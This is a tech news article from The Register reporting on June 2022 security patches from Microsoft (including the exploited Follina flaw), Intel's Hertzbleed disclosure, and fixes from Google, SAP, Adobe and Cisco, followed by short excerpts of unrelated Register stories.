Patch Tuesday Microsoft claims to have finally fixed the Follina zero-day flaw in Windows as part of its June Patch Tuesday batch, which included security updates to address 55 vulnerabilities.

Follina, eventually acknowledged by Redmond in a security advisory last month, is the most significant of the bunch as it has already been exploited in the wild.

Criminals and snoops can abuse the remote code execution (RCE) bug, tracked as CVE-2022-30190, by crafting a file, such as a Word document, so that when opened it calls out to the Microsoft Windows Support Diagnostic Tool, which is then exploited to run malicious code, such spyware and ransomware. Disabling macros in, say, Word won't stop this from happening.

Since May, malware operators, including state-sponsored gangs, have used Follina to menace or compromise organizations, including US and European government agencies; to spread the data-stealing Qbot malware; and to delete data and install banking trojans, among other illicit activities.

"The update for this vulnerability is in the June 2022 cumulative Windows Updates," Redmond said in today's Follina security update.

"Microsoft strongly recommends that customers install the updates to be fully protected from the vulnerability. Customers whose systems are configured to receive automatic updates do not need to take any further action."

In addition to mitigating Follina, Microsoft plugged three critical RCE flaws and said none of them have been exploited.

The most severe of the three (CVE-2022-30136), which received a 9.8 out of 10 CVSS rating, affects the Windows Network File System (NFS). Microsoft noted exploitation is "more likely" for this bug, and said that can occur if a miscreant, who is already on the network, makes an unauthenticated, specially crafted call to an NFS service to execute remote code.

"With a score of 9.8, if you're sharing files and file systems over a network with NFS, this should be high on the list to patch,"  Immersive Labs' Kev Breen, director of cyber threat research, warned. 

However, if you can't patch right away, Remond suggested disabling NFSV4.1. "This could adversely affect your ecosystem and should only be used as a temporary mitigation," it cautioned, adding a bolded warning: "You should NOT apply this mitigation unless you have installed the May 2022 Windows security updates." These fix CVE-2022-26937, another critical vuln in NFS.

The next critical RCE, CVE-2022-30163, is in the Windows Hyper-V hypervisor. It received a CVSS score of 8.5, and it would be a fairly complex attack to pull off (a miscreant would have to win an unidentified race condition from an application). But if exploited it could be used to move from a guest virtual machine (VM) to the host where potentially a lot of damage or snooping can be done.

The third critical RCE is CVE-2022-30139 in Windows Lightweight Directory Access Protocol (LDAP) code, though by default systems should not be exploitable.

And while CVE-2022-30147, a Windows Installer elevation of privilege vulnerability with a CVSS score of 7.8 doesn't rank as high, severity wise, as some of the others, "this kind of vulnerability is almost always seen during a cyber attack," Breen noted. Microsoft also marked this bug as more likely to be exploited.

After gaining initial access, an intruder can escalate privileges to the level of an administrator and then disable security tools. "In the case of ransomware attacks, this leverages access to more sensitive data before encrypting the files," Breen told The Register.

As always, there's a summary of Microsoft's patches here by the ZDI.

Intel joined in the Patch Tuesday fun with three security advisories addressing six medium-severity bugs. 

One of these, CVE-2022-24436, was named Hertzbleed and reported to Intel by university researchers. "In the worst case, these attacks can allow an attacker to extract cryptographic keys from remote servers that were previously believed to be secure," the boffins warned.

Hertzbleed is a type of side-channel attack that takes advantage of dynamic frequency scaling and affects all Intel processors along with several of AMD's desktop, mobile and server chips, according to that company.

The researchers said they have notified other processor vendors, such as Arm, and haven't confirmed if they are affected by Hertzbleed.

Essentially all modern CPUs use frequency scaling, which is an energy management technique that auto-adjusts the CPU core clock frequency depending on the actual processing taking place. A clever attacker could monitor this scaling to infer exactly what data is being processed – using the core frequency to leak the content of data being handled by code – and steal, for instance, cryptographic keys being handled by the processor. All by paying close attention to exactly how long some code completes, which is affected by the frequency scaling.

As the academics put it: "Hertzbleed takes advantage of our experiments showing that, under certain circumstances, the dynamic frequency scaling of modern x86 processors depends on the data being processed."

It's a very smart and very fiddly timing attack, and slow – like tens of bits per second leaked – and may be exploitable depending on your circumstances. Like with Meltdown and Spectre, there are easier bugs (see above) for miscreants to target to steal data. But it's interesting research. The uni team stated:

First, Hertzbleed shows that on modern x86 CPUs, power side-channel attacks can be turned into (even remote!) timing attacks — lifting the need for any power measurement interface. The cause is that, under certain circumstances, periodic CPU frequency adjustments depend on the current CPU power consumption, and these adjustments directly translate to execution time differences (as 1 hertz = 1 cycle per second).

Second, Hertzbleed shows that, even when implemented correctly as constant time, cryptographic code can still leak via remote timing analysis. The result is that current industry guidelines for how to write constant-time code (such as Intel's one) are insufficient to guarantee constant-time execution on modern processors.

Intel, for its part, provided software guidance for cryptographic code writers, which the chip giant says will help harden libraries and apps against leaking sensitive information. In another security advisory, it basically described Hertzbleed as a fun topic of discussion for geeks at cocktail parties, and no microcode fixes will be coming.

"While this issue is interesting from a research perspective, we do not believe this attack to be practical outside of a lab environment," wrote Jerry Bryant, Intel's senior director of security communications and incident response. "Also note that cryptographic implementations that are hardened against power side-channel attacks are not vulnerable to this issue."

AMD also suggested developers put in place countermeasures in their code.

Meanwhile, Google issued seven security fixes for Chrome and 41 for Android this month. 

Four of the Android vulnerabilities are critical, and the "most severe," according to the June security bulletin, "could lead to remote code execution with no additional execution privileges needed."

In its Chrome advisory, the cloud giant highlighted four high-severity flaws found by external bug hunters. CISA has also warned that miscreants could exploit the bugs to take control of affected systems and urged folks to update now. 

One of flaws, tracked as CVE-2022-2007, affects an unknown function of the WebGPU component in Google's Chrome browser and is a memory corruption vulnerability, according to VulDB. 

While Google didn't provide much detail about the bug, the vulnerability database reports that it's easy to exploit without any form of authentication. Luckily, no technical details nor an exploit are publicly available. 

Google paid David Manouchehri, the security researcher who found the vuln, $10,000 back in May. Meanwhile, an exploit would likely cost between $5,000 and $25,000, although VulnDB expects the price tag to increase "in the near future."

SAP released 17 security patches this month. This includes HotNews note 2622660, which covers the latest Chromium release, 101.0.4951.54.

SAP also advised customers to fix a couple of improper access control issues in its products. One, detailed in High Priority note 3158375 affects SAP NetWeaver and ABAP Platform and received a CVSS score of 8.6. 

"A permissive configuration of the route permission table may allow an unauthenticated attacker to bypass the protection to execute administration commands on the systems connected to the SAPRouter, compromising the availability of the systems," Onapsis explained. 

The second, detailed in High Priority note note 3147498 affects SAP NetWeaver AS Java and received a CVSS score of 8.2. 

In addition to SAP's June security updates, Onapsis researchers said they detected miscreants exploiting three vulnerabilities that SAP already patched: CVE-2021-38163, CVE-2016-2386, and CVE-2016-2388. 

Earlier this month CISA updated updated its Catalog of Known Exploited Vulnerabilities to include all three. 

Adobe closed 46 holes in its enterprise products for its June Patch Tuesday, and a whopping 40 of these are critical, according to the software maker. All of these except one affect Adobe products running on both Windows and macOS, and Adobe issued security hotfix for that one outlier, RoboHelp Server.

This flaw only hits RoboHelp running Windows machines. And while it's rated moderate, if exploited it could allow users to manipulate API requests and elevate their account privileges to that of a server administrator.

All of the other products included in the June patchapalooza have at least one critical vuln, and this includes an out-of-bounds-write vulnerability in Adobe Animate that affects 22.0.5 and earlier versions running on Windows and MacOS. Adobe publishes very little detail about any of these vulnerabilities, but admits that this one could lead to remote code execution.

Adobe Bridge requires patches for 12 flaws, 11 of them deemed critical and one important. A criminal could exploit these to execute malicious code or modify files on a system.

Adobe Illustrator comes in at 13 critical, three important and one moderate flaw that could lead to arbitrary code execution and memory leaks. 

And finally Adobe InCopy and Adobe InDesign have a combined 15 critical bugs, which could all lead to arbitrary code execution. 

Closing out the June patch-a-thon, Cisco clocked 10 security updates this month, including a new fix for the critical Spring Framework vulnerability disclosed back in March. 

The networking firm also patched a denial of service vulnerability in the software-based SSL/TLS message handler of Cisco Firepower Threat Defense (FTD) Software. This high-severity flaw could be exploited by an unauthenticated, remote attacker by sending a crafted SSL/TLS message through an affected device, thus crashing the process and triggering a reload of the device, according to Cisco. ®

Science fiction is littered with fantastic visions of computing. One of the more pervasive is the idea that one day computers will run on light. After all, what’s faster than the speed of light?

But it turns out Star Trek’s glowing circuit boards might be closer to reality than you think, Ayar Labs CTO Mark Wade tells The Register. While fiber optic communications have been around for half a century, we’ve only recently started applying the technology at the board level. Despite this, Wade expects, within the next decade, optical waveguides will begin supplanting the copper traces on PCBs as shipments of optical I/O products take off.

Driving this transition are a number of factors and emerging technologies that demand ever-higher bandwidths across longer distances without sacrificing on latency or power.

QNAP is warning users about another wave of DeadBolt ransomware attacks against its network-attached storage (NAS) devices – and urged customers to update their devices' QTS or QuTS hero operating systems to the latest versions.

The latest outbreak – detailed in a Friday advisory – is at least the fourth campaign by the DeadBolt gang against the vendor's users this year. According to QNAP officials, this particular run is encrypting files on NAS devices running outdated versions of Linux-based QTS 4.x, which presumably have some sort of exploitable weakness.

The previous attacks occurred in January, March, and May.

A US task force aims to prevent online harassment and abuse, with a specific focus on protecting women, girls and LGBTQI+ individuals.

In the next 180 days, the White House Task Force to Address Online Harassment and Abuse will, among other things, draft a blueprint on a "whole-of-government approach" to stopping "technology-facilitated, gender-based violence." 

A year after submitting the blueprint, the group will provide additional recommendations that federal and state agencies, service providers, technology companies, schools and other organisations should take to prevent online harassment, which VP Kamala Harris noted often spills over into physical violence, including self-harm and suicide for victims of cyberstalking as well mass shootings.

A decentralized autonomous organization (DAO) called Inverse Finance has been robbed of cryptocurrency somehow exchangeable for $1.2 million, just two months after being taken for $15.6 million.

"Inverse Finance’s Frontier money market was subject to an oracle price manipulation incident that resulted in a net loss of $5.83 million in DOLA with the attacker earning a total of $1.2 million," the organization said on Thursday in a post attributed to its Head of Growth "Patb."

And Inverse Finance would like its funds back. Enumerating the steps the DAO intends to take in response to the incident, Patb said, "First, we encourage the person(s) behind this incident to return the funds to the Inverse Finance DAO in return for a generous bounty."

UK Home Secretary Priti Patel today signed an order approving the extradition of Julian Assange to America, where he faces espionage charges for sharing secret government documents.

Assange led WikiLeaks, a website that released classified files including footage of US airstrikes and military documents from the Iraq and Afghanistan war that detailed civilian casualties.

It also distributed secret files revealing the torture of detainees at Guantanamo Bay, and sensitive communications from the Democratic National Committee and Hillary Clinton's campaign manager, John Podesta, during the 2016 US presidential election. 

A group of senators wants to make it illegal for data brokers to sell sensitive location and health information of individuals' medical treatment.

A bill filed this week by five senators, led by Senator Elizabeth Warren (D-MA), comes in anticipation the Supreme Court's upcoming ruling that could overturn the 49-year-old Roe v. Wade ruling legalizing access to abortion for women in the US.

The worry is that if the Supreme Court strikes down Roe v. Wade – as is anticipated following the leak in May of a majority draft ruling authored by Justice Samuel Alito – such sensitive data can be used against women.

A Russian operated botnet known as RSOCKS has been shut down by the US Department of Justice acting with law enforcement partners in Germany, the Netherlands and the UK. It is believed to have compromised millions of computers and other devices around the globe.

The RSOCKS botnet functioned as an IP proxy service, but instead of offering legitimate IP addresses leased from internet service providers, it was providing criminals with access to the IP addresses of devices that had been compromised by malware, according to a statement from the US Attorney’s Office in the Southern District of California.

It seems that RSOCKS initially targeted a variety of Internet of Things (IoT) devices, such as industrial control systems, routers, audio/video streaming devices and various internet connected appliances, before expanding into other endpoints such as Android devices and computer systems.

Interview 2023 is shaping up to become a big year for Arm-based server chips, and a significant part of this drive will come from Nvidia, which appears steadfast in its belief in the future of Arm, even if it can't own the company.

Several system vendors are expected to push out servers next year that will use Nvidia's new Arm-based chips. These consist of the Grace Superchip, which combines two of Nvidia's Grace CPUs, and the Grace-Hopper Superchip, which brings together one Grace CPU with one Hopper GPU.

The vendors lining up servers include American companies like Dell Technologies, HPE and Supermicro, as well Lenovo in Hong Kong, Inspur in China, plus ASUS, Foxconn, Gigabyte, and Wiwynn in Taiwan are also on board. The servers will target application areas where high performance is key: AI training and inference, high-performance computing, digital twins, and cloud gaming and graphics.

The US could implement a law similar to the EU's universal charger mandate if a trio of Senate Democrats get their way.

In a letter [PDF] to Commerce secretary Gina Raimondo, two of Massachusetts' senators Ed Markey and Elizabeth Warren, along with Bernie Sanders (I-VT), say a proliferation of charging standards has created a messy situation for consumers, as well as being an environmental risk. 

"As specialized chargers become obsolete … or as consumers change the brand of phone or device that they use, their outdated chargers are usually just thrown away," the senators wrote. The three cite statistics from the European Commission, which reported in 2021 that discarded and unused chargers create more than 11,000 tons of e-waste annually.

Microsoft is extending the Defender brand with a version aimed at families and individuals.

"Defender" has been the company's name of choice for its anti-malware platform for years. Microsoft Defender for individuals, available for Microsoft 365 Personal and Family subscribers, is a cross-platform application, encompassing macOS, iOS, and Android devices and extending "the protection already built into Windows Security beyond your PC."

The system comprises a dashboard showing the status of linked devices as well as alerts and suggestions.

Taiwanese chipmaker TSMC has revealed details of its much anticipated 2nm production process node – set to arrive in 2025 – which will use a nanosheet transistor architecture, as well as enhancements to its 3nm technology.

The newer generations of silicon semiconductor chips are expected to bring about increases in speed and will be more energy efficient as process nodes shrink and the tech industry continues to fight to hang onto Moore's Law.

The company is due to go into production with the 3nm node in the second half of this year.

The Register - Independent news and views for the tech community. Part of Situation Publishing

Biting the hand that feeds IT © 1998–2022